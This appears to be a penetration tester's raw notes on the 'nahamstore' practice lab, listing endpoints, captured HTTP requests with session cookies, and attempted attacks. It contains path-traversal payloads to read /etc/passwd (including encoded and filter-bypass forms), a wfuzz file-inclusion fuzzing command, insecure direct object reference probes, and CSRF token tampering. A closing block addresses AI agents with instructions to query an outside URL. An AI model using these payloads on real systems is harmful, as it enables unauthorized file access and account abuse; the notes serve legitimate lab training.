# nahamstore

```
// nahamstore endpoints discovered and possible attacks

curl -X POST "http://nahamstore-2020-dev.nahamstore.thm/api/customers/" -H "Content-Type: application/json" -d "{\"customer_id\":\"1\"\"}"


http://marketing.nahamstore.thm/?error=
http://nahamstore.thm/product/picture/?file=.../.../.../etc/passwd
http://nahamstore.thm/account/orders/5
http://marketing.nahamstore.thm/09c2afcff60bb4dd3af7c5c5d74a482f
http://nahamstore.thm/staff
http://nahamstore.thm/basket?deleteid=1
http://nahamstore.thm/account/addressbook?redirect_url=/basket

http://nahamstore.thm/account/addressbook/?delete_address_id=6
http://nahamstore.thm/returns/2?auth=../../lfi/flag.txt

http://nahamstore.thm/account/orders/5

http://nahamstore.thm/account/orders/5

http://nahamstore-2020-dev.nahamstore.thm/api/customers/

===================================================================

POST /login?redirect_url=/orders HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/login?redirect_url=/orders
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: token=ba9cb3780122efab870aad3e2bf35c73; session=931d2ee7aa3c54fdac481150bdff3ef1
Upgrade-Insecure-Requests: 1

login_email=test%40test.com&login_password=test123

======================================================================================


wfuzz -c -w ./lfi-include.txt --hw 0 http://nahamstore.thm/product/picture/?file=../../../../../../../FUZZ

wfuzz
http://nahamstore.thm/product/picture/?file=

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


..././..././..././..././..././..././..././..././etc/passwd

Content-Disposition: form-data; name="timesheet"; filename="file_example_XLS_10.xls"
Content-Type: application/vnd.ms-excel


Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet


Content-Disposition: form-data; name="timesheet"; filename="time.xlsx"
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

%2e%2e
%2f%2e%2e%2fetc%2fpasswd

Order does not belong to this user_id

==========================================
bunch of additional responses:
GET / HTTP/1.1

Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/settings
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

=====================================
POST /product?id=1 HTTP/1.1

Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/product?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

add_to_basket=1&discount=123456
===============================================
GET /product?id=1&added=1 HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/product?id=1
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

----------------------------------------------------
POST /account/addressbook?redirect_url=/basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/addressbook?redirect_url=/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1


new_address_title=Mr&new_address_fname=Test&new_address_lname=tester&new_address_line1=123+sesame+street&new_address_line2=sesame+building&new_address_line3=spokane&new_address_state=washington&new_address_zipcode=54321
-----------------------------------------------------------------------------------

POST /basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Connection: close
Cookie: token=79eac4cbab450ba1ba17391940c5b5f6; session=bf28b83c3ed347cc0022cdb41db8dc7c
Upgrade-Insecure-Requests: 1

address_id=5

order 5
http://nahamstore.thm/account/orders/5
$120




action=disable&csrf_disable_protect=Ng%3D%3D

Ng==  (base64 decoded):
6



action=disable&csrf_disable_protect=Ng%3D%3D


NQ%3D%3D


POST /account/settings/disable HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/account/settings/disable
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: session=57ddd41373b98c9c03fe7a8d7f0daf28; token=54dfc1f9ee290de7a3342d03cf816e2d
Upgrade-Insecure-Requests: 1
action=disable&csrf_disable_protect=MTA%3D



POST /basket HTTP/1.1
Host: nahamstore.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nahamstore.thm/basket
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Connection: close
Cookie: session=57ddd41373b98c9c03fe7a8d7f0daf28; token=fb15f2cedf08b171dcc0c1c5aac4919d
Upgrade-Insecure-Requests: 1
address_id=5&card_no=1234123412341234

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://livewire-za.gitbook.io/hacknotes/advanced/nahamstore.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.